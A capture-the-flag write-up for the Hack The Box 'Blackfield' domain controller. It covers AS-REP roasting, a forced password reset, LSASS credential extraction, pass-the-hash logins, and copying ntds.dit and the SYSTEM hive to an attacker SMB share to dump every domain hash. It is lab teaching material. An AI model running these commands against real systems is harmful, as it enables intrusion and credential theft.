HTB WriteUps

Blackfield

Last updated 2 years ago

Enumeration

As always, we start with the enumeration phase, scanning the machine for open ports and then identifying the services and versions behind them.

The following nmap command quickly scans the whole port range of the target and saves the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.192 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Wed Apr  5 09:35:24 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.099s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
3268/tcp  open  globalcatLDAP
5985/tcp  open  wsman
49676/tcp open  unknown

# Nmap done at Wed Apr  5 09:36:17 2023 -- 1 IP address (1 host up) scanned in 53.23 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p53,88,135,139,389,445,593,3268,5985,49676 10.10.10.192 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Wed Apr  5 09:36:40 2023 as: nmap -sCV -p53,88,135,139,389,445,593,3268,5985,49676 -Pn -n -oN targeted 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.067s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-05 15:36:49Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   filtered netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49676/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-04-05T15:36:56
|_  start_date: N/A
|_clock-skew: 8h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr  5 09:37:32 2023 -- 1 IP address (1 host up) scanned in 51.93 seconds

Port 53 is open, so we can ask the DNS server directly for every record it holds for blackfield.local with dig. This is an ANY query at the zone apex, not a subdomain brute force, but it hands us the name server and SOA records for free.

dig any blackfield.local @10.10.10.192

; <<>> DiG 9.18.11-2-Debian <<>> any blackfield.local @10.10.10.192
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53091
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;blackfield.local.              IN      ANY

;; ANSWER SECTION:
blackfield.local.       600     IN      A       10.10.10.192
blackfield.local.       3600    IN      NS      dc01.blackfield.local.
blackfield.local.       3600    IN      SOA     dc01.blackfield.local. hostmaster.blackfield.local. 165 900 600 86400 3600
blackfield.local.       600     IN      AAAA    dead:beef::59ff:6dfe:cd4c:21f9

;; ADDITIONAL SECTION:
dc01.blackfield.local.  3600    IN      A       10.10.10.192
dc01.blackfield.local.  3600    IN      AAAA    dead:beef::59ff:6dfe:cd4c:21f9

;; Query time: 36 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (TCP)
;; WHEN: Wed Apr 05 11:36:42 CEST 2023
;; MSG SIZE  rcvd: 199

Let's add the host names to the /etc/hosts file. Note that hostmaster.blackfield.local in the SOA record is the zone administrator's mailbox (hostmaster@blackfield.local), not a host, so only blackfield.local and dc01.blackfield.local really need to be there; adding it does no harm.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.192    blackfield.local dc01.blackfield.local hostmaster.blackfield.local

Let's keep enumerating the domain controller. We can check whether there is any interesting share on the SMB server, authenticating as guest (a null session):

smbmap -H 10.10.10.192 -u 'guest'

[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                            Permissions     Comment
        ----                            -----------     -------
        ADMIN$                          NO ACCESS       Remote Admin
        C$                              NO ACCESS       Default share
        forensic                        NO ACCESS       Forensic / Audit share.
        IPC$                            READ ONLY       Remote IPC
        NETLOGON                        NO ACCESS       Logon server share 
        profiles$                       READ ONLY
        SYSVOL                          NO ACCESS       Logon server share

If we list the profiles$ share, we'll see a bunch of directories named like user accounts (first initial plus surname).

smbmap -H 10.10.10.192 -u 'guest' -r profiles$

[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                                            Permissions     Comment
        ----                                            -----------     -------
        profiles$                                       READ ONLY
        .\profiles$\*
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    .
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ..
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    AAlleni
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    ABarteski
        dr--r--r--        0 Wed Jun  3 18:47:11 2020    ABekesz
...
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZScozzari
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZTimofeeff
        dr--r--r--        0 Wed Jun  3 18:47:12 2020    ZWausik

Exploitation

Let's put those directory names in the users file. The . and .. entries slip through the grep as well; they are harmless, kerbrute simply reports them as invalid.

smbmap -H 10.10.10.192 -u 'guest' -r profiles$ | grep "dr--r--r--" | awk '{print $8}' > users

As the domain controller has the Kerberos service exposed, we can verify if any of these users is valid using kerbrute.

kerbrute_linux_amd64 userenum --dc 10.10.10.192 -d blackfield.local users

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/05/23 - Ronnie Flathers @ropnop

2023/04/05 12:38:10 >  Using KDC(s):
2023/04/05 12:38:10 >   10.10.10.192:88

2023/04/05 12:38:31 >  [+] VALID USERNAME:       audit2020@blackfield.local
2023/04/05 12:40:23 >  [+] VALID USERNAME:       support@blackfield.local
2023/04/05 12:40:28 >  [+] VALID USERNAME:       svc_backup@blackfield.local
2023/04/05 12:40:53 >  Done! Tested 314 usernames (3 valid) in 162.879 seconds

Now that we have a list of valid users, put them into a file (valid_users), and let's try an ASREPRoast attack.

ASREPRoast attack: when an account has Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH), the KDC answers an AS-REQ for that user without any proof of the password. Part of the AS-REP it returns is encrypted with a key derived from the user's password (for RC4-HMAC, etype 23, that key is the NT hash), so that blob can be taken offline and cracked against a wordlist.

impacket-GetNPUsers blackfield.local/ -no-pass -usersfile valid_users

  • -no-pass don't ask for password.

  • -usersfile file which contains user per line.

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User audit2020@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL:ebd84a2b32ac125aa65fb405985c0a48$4861262f396e28b5d77218ffc4ae62e5e89315cbb26ea97fa75cab030ab186c5e0a1b3e6d9ee0526f3e46dbddd79dd252d77ef77daee5072b5d7bc8beaf5e709f710baae3d0a80fb9f17043f2b0f5b9134bcd27c6b379070ce9d8c7e59b7ac1e21837d2f58ecbb991ee6317ecaac8504b5cfd3ad8e43c6c158f44d855e00bafb2293b147cec5c1528ee3449ee8a4bf9bd7dcfc89e3b5871485cd9d1849a05fbf035c85e89a9921a0892f6d1f75c6c4a3e941ec7c6c792ec67cab1a4bae065e6ae17c7aa53320d66f718c8c0713c15a59710266e7b7b159d7919ebecdf54352f368e22c2e87caa611c929348a1518748cb9b323a3
[-] User svc_backup@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set

We get a hash for the support user. Save the $krb5asrep$ line into a file called hash and let's crack it with john.

john -w=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL)     
1g 0:00:00:10 DONE (2023-04-05 12:42) 0.09132g/s 1309Kp/s 1309Kc/s 1309KC/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Let's use the credentials that we have to enumerate the domain controller more in depth with bloodhound-python.

bloodhound-python -c All -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local

INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
(16 more identical "Querying computer:" lines with an empty host name omitted)
INFO: Querying computer: DC01.BLACKFIELD.local
WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 10S

Note the KRB_AP_ERR_SKEW warning: nmap reported an 8-hour clock skew and Kerberos tolerates only 5 minutes by default. bloodhound-python fell back to NTLM, so collection still completed, but for Kerberos-only operations sync your clock to the DC first (for example with ntpdate) or run the tool under faketime.

Now, we have to start BloodHound. First, we have to start neo4j.

neo4j console

Then browse to http://localhost:7474 and log in with the default username neo4j and password neo4j. You'll be asked to change the password.

On a new console, run BloodHound.

bloodhound -nosandbox

Then log in with the credentials you set up earlier.

Then, click on the Upload Data button on the right section and select all the .json files generated with bloodhound-python.

Once all the .json files are uploaded, search for the user support@blackfield.local. In the First Degree Object Control section we'll see a ForceChangePassword edge from support to audit2020: support can reset audit2020's password without knowing the current one.
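The GUI is convenient, but the same answer is already in the JSON bloodhound-python wrote, and reading it directly is handy when neo4j is not available or you want to check one principal quickly. The following is an added example, not part of the original writeup: it walks the Aces lists in the users file and lists every object a given principal controls, which is what the First Degree Object Control panel shows. The embedded JSON is constructed to mirror the bloodhound-python users.json layout (ObjectIdentifier, Properties.name, Aces[].PrincipalSID / RightName / IsInherited) with made-up SIDs; verify the field names against your own files, since the format has changed between BloodHound versions.

```python
import glob
import json
from typing import Iterable, List, Optional, Tuple

# Constructed sample in the shape of a bloodhound-python <timestamp>_users.json file.
# SIDs and ACEs are invented for this example; the names follow the page.
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {
            "ObjectIdentifier": "S-1-5-21-111-222-333-1103",
            "Properties": {"name": "AUDIT2020@BLACKFIELD.LOCAL", "domain": "BLACKFIELD.LOCAL"},
            "Aces": [
                {"PrincipalSID": "S-1-5-21-111-222-333-1104", "PrincipalType": "User",
                 "RightName": "ForceChangePassword", "IsInherited": False},
                {"PrincipalSID": "S-1-5-21-111-222-333-512", "PrincipalType": "Group",
                 "RightName": "GenericAll", "IsInherited": True},
            ],
        },
        {
            "ObjectIdentifier": "S-1-5-21-111-222-333-1104",
            "Properties": {"name": "SUPPORT@BLACKFIELD.LOCAL", "domain": "BLACKFIELD.LOCAL"},
            "Aces": [],
        },
    ],
    "meta": {"type": "users", "count": 2, "version": 4},
})

# Rights that let the principal take over the target object (the abusable edges).
CONTROL_RIGHTS = {"ForceChangePassword", "GenericAll", "GenericWrite", "WriteDacl",
                  "WriteOwner", "AllExtendedRights", "AddMember", "Owns"}

Edge = Tuple[str, str, bool]   # (right, target name, inherited?)


def sid_of(objects: Iterable[dict], name: str) -> Optional[str]:
    """Look up a principal's SID by its BloodHound name (case-insensitive)."""
    for obj in objects:
        if obj.get("Properties", {}).get("name", "").upper() == name.upper():
            return obj["ObjectIdentifier"]
    return None


def outbound_control(objects: Iterable[dict], principal_sid: str,
                     rights=CONTROL_RIGHTS) -> List[Edge]:
    """Every ACE in `objects` that grants principal_sid one of `rights`: the
    'First Degree Object Control' list for that principal, computed from raw JSON."""
    objects = list(objects)
    names = {o["ObjectIdentifier"]: o.get("Properties", {}).get("name", o["ObjectIdentifier"])
             for o in objects}
    edges: List[Edge] = []
    for obj in objects:
        for ace in obj.get("Aces", []):
            if ace.get("PrincipalSID") == principal_sid and ace.get("RightName") in rights:
                edges.append((ace["RightName"], names[obj["ObjectIdentifier"]],
                              bool(ace.get("IsInherited", False))))
    return edges


def find_outbound_control(raw_json: str, principal_sid: str) -> List[Edge]:
    return outbound_control(json.loads(raw_json)["data"], principal_sid)


def find_outbound_control_in_files(pattern: str, principal_name: str) -> List[Edge]:
    """Same search over real collector output, e.g. pattern '*.json' in the directory
    where bloodhound-python wrote users/groups/computers files."""
    objects: List[dict] = []
    for path in glob.glob(pattern):
        with open(path, encoding="utf-8") as fh:
            objects.extend(json.load(fh).get("data", []))
    sid = sid_of(objects, principal_name)
    return outbound_control(objects, sid) if sid else []


if __name__ == "__main__":
    data = json.loads(SAMPLE_USERS_JSON)["data"]
    sid = sid_of(data, "support@blackfield.local")
    for right, target, inherited in outbound_control(data, sid):
        print(f"SUPPORT -[{right}]-> {target}{' (inherited)' if inherited else ''}")
```

Running find_outbound_control_in_files("*.json", "support@blackfield.local") in the collector's output directory covers groups and computers as targets too, since every object type carries its own Aces list; group membership (support controlling something through a group it belongs to) is a separate hop and is not resolved here.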

We can change the password of the audit2020 user as support using rpcclient (setuserinfo2 with information level 23). Keep in mind this resets the account's password to one of our choosing and the old one cannot be restored, which the real user will notice; on a real engagement make sure that is in scope.

rpcclient -N -U 'support%#00^BlackKnight' 10.10.10.192 -c "setuserinfo2 audit2020 23 alfa8sa123$"

Verify that the credentials are valid.

crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'

SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:alfa8sa123$

Now that we have valid credentials for the audit2020 user, let's see if we have access to any other share.

smbmap -H 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'

[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                            Permissions     Comment
        ----                            -----------     -------
        ADMIN$                          NO ACCESS       Remote Admin
        C$                              NO ACCESS       Default share
        forensic                        READ ONLY       Forensic / Audit share.
        IPC$                            READ ONLY       Remote IPC
        NETLOGON                        READ ONLY       Logon server share 
        profiles$                       READ ONLY
        SYSVOL                          READ ONLY       Logon server share

There is one more interesting share, forensic, in which we now have read permissions. Let's mount it on our local system (this needs root and an existing mount point; the password is the one we just set):

mount -t cifs //10.10.10.192/forensic /mnt/forensic/ -o "username=audit2020,password=alfa8sa123$,domain=BLACKFIELD.local,rw"

Inside there is a directory called memory_analysis.

ls -l /mnt/forensic/

total 0
drwxr-xr-x 2 root root 0 Feb 23  2020 commands_output
drwxr-xr-x 2 root root 0 May 28  2020 memory_analysis
drwxr-xr-x 2 root root 0 Feb 23  2020 tools

This directory has ZIP files. There is one called lsass.zip. If this file has the LSASS memory compressed in it, we could extract passwords and hashes from it.

ls -l /mnt/forensic/memory_analysis/

total 506000
-rwxr-xr-x 1 root root  37876530 May 28  2020 conhost.zip
-rwxr-xr-x 1 root root  24962333 May 28  2020 ctfmon.zip
-rwxr-xr-x 1 root root  23993305 May 28  2020 dfsrs.zip
-rwxr-xr-x 1 root root  18366396 May 28  2020 dllhost.zip
-rwxr-xr-x 1 root root   8810157 May 28  2020 ismserv.zip
-rwxr-xr-x 1 root root  41936098 May 28  2020 lsass.zip
-rwxr-xr-x 1 root root  64288607 May 28  2020 mmc.zip
-rwxr-xr-x 1 root root  13332174 May 28  2020 RuntimeBroker.zip
-rwxr-xr-x 1 root root 131983313 May 28  2020 ServerManager.zip
-rwxr-xr-x 1 root root  33141744 May 28  2020 sihost.zip
-rwxr-xr-x 1 root root  33756344 May 28  2020 smartscreen.zip
-rwxr-xr-x 1 root root  14408833 May 28  2020 svchost.zip
-rwxr-xr-x 1 root root  34631412 May 28  2020 taskhostw.zip
-rwxr-xr-x 1 root root  14255089 May 28  2020 winlogon.zip
-rwxr-xr-x 1 root root   4067425 May 28  2020 wlms.zip
-rwxr-xr-x 1 root root  18303252 May 28  2020 WmiPrvSE.zip

Transfer it to our current directory, and decompress it.

cp /mnt/forensic/memory_analysis/lsass.zip .

unzip lsass.zip

Now we have the lsass.DMP file. On Windows this dump would be parsed with Mimikatz (sekurlsa::minidump), but from our Linux box we can use pypykatz, a Python reimplementation of that functionality, to pull the cached credentials out of it.

pypykatz lsa minidump lsass.DMP

INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
...
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)

...

Among other secrets, we get the NT hash of svc_backup. We can pass the hash straight to WinRM with evil-winrm; if svc_backup is a member of Remote Management Users we'll get a shell and can grab the user flag.

evil-winrm -i 10.10.10.192 -u 'svc_backup' -H 9658d1d1dcd9250115e2205d9f48400d

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type \users\svc_backup\desktop\user.txt
3920bb317a0bef51027e2852be64b543

Privilege Escalation

Indeed, the svc_backup user is a member of Remote Management Users, but it is also a member of the Backup Operators group.

Backup Operators grants its members the SeBackupPrivilege and SeRestorePrivilege. SeBackupPrivilege lets a process open any file or folder for reading, bypassing the NTFS ACL, as long as it opens with backup semantics (which tools like robocopy /b and diskshadow do). What it does not bypass is a sharing violation: ntds.dit is held open exclusively by LSASS, so we'll need a Volume Shadow Copy to read it.

net user svc_backup

User name                    svc_backup
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2020 10:54:48 AM
Password expires             Never
Password changeable          2/24/2020 10:54:48 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   4/5/2023 9:00:19 AM

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

The idea is to copy the ntds.dit file to our system, so we can extract the NTLM hashes of all the domain users. We can follow the article "Dumping Domain Password Hashes". First, set up a simple SMB server on the current directory of our attacking machine, so the files can be copied straight back:

impacket-smbserver smbFolder $(pwd) -smb2support

Now, go to \windows\temp, create the directory privEsc, and move into it.

cd \windows\temp

mkdir privEsc

cd privEsc

Then, create a new file called diskshadow.txt with the content below and upload it to the victim machine. Make sure to add a blank space at the end of each line; diskshadow is picky about script files written on Linux and will otherwise misread the commands.

nano diskshadow.txt

upload /home/alfa8sa/HTB/machines/blackfield/diskshadow.txt

set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% z: 

Run diskshadow with the script to create a persistent shadow copy of C: and expose it as drive Z:. The shadow copy is a point-in-time snapshot, so the ntds.dit inside it is not locked by LSASS.

diskshadow.exe /s diskshadow.txt

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  4/5/2023 12:35:51 PM

-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {3abd85c1-910d-4b72-86cc-871254097018} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} set as environment variable.

Querying all shadow copies with the shadow copy set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7}

        * Shadow copy ID = {3abd85c1-910d-4b72-86cc-871254097018}               %someAlias%
                - Shadow copy set: {4adb43d3-6632-4dd0-b257-0e6232d6d1d7}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 4/5/2023 12:35:52 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %someAlias% z:
-> %someAlias% = {3abd85c1-910d-4b72-86cc-871254097018}
The shadow copy was successfully exposed as z:\.
->

Now, we should see the ntds.dit in the z: disk.

dir z:\windows\ntds

    Directory: z:\windows\ntds


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2023   2:34 PM           8192 edb.chk
-a----         4/5/2023  12:35 PM       10485760 edb.log
-a----        2/23/2020   9:41 AM       10485760 edb00004.log
-a----        2/23/2020   9:41 AM       10485760 edb00005.log
-a----        2/23/2020   3:13 AM       10485760 edbres00001.jrs
-a----        2/23/2020   3:13 AM       10485760 edbres00002.jrs
-a----        2/23/2020   9:41 AM       10485760 edbtmp.log
-a----         4/5/2023  12:30 PM       18874368 ntds.dit
-a----         4/5/2023  12:30 PM          16384 ntds.jfm
-a----         4/5/2023  12:30 PM         434176 temp.edb

Let's copy it to our local SMB server with robocopy. The /b switch puts robocopy in backup mode, which enables SeBackupPrivilege and opens the file with backup semantics, so the NTFS ACL on the ntds directory does not stop us:

robocopy /b z:\windows\ntds \\10.10.14.5\smbFolder\ ntds.dit

We will also need the SYSTEM registry hive, which holds the boot key used to decrypt the password encryption key stored in ntds.dit:

reg save HKLM\system \\10.10.14.5\smbFolder\system

Finally, we can extract the NTLM hashes with secretsdump.

impacket-secretsdump -system system -ntds ntds.dit LOCAL

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2a2f8ac26db968c93a17fefdb36c38ee:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...

As we have the NT hash of the administrator user, we can pass the hash over WinRM and get a shell. Then, all we have to do is reap the harvest and take the root flag.

evil-winrm -i 10.10.10.192 -u 'administrator' -H 184fb5e5178480be64824d4cd53b99ee

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
4375a629c7c67c8e29db269060c955cb
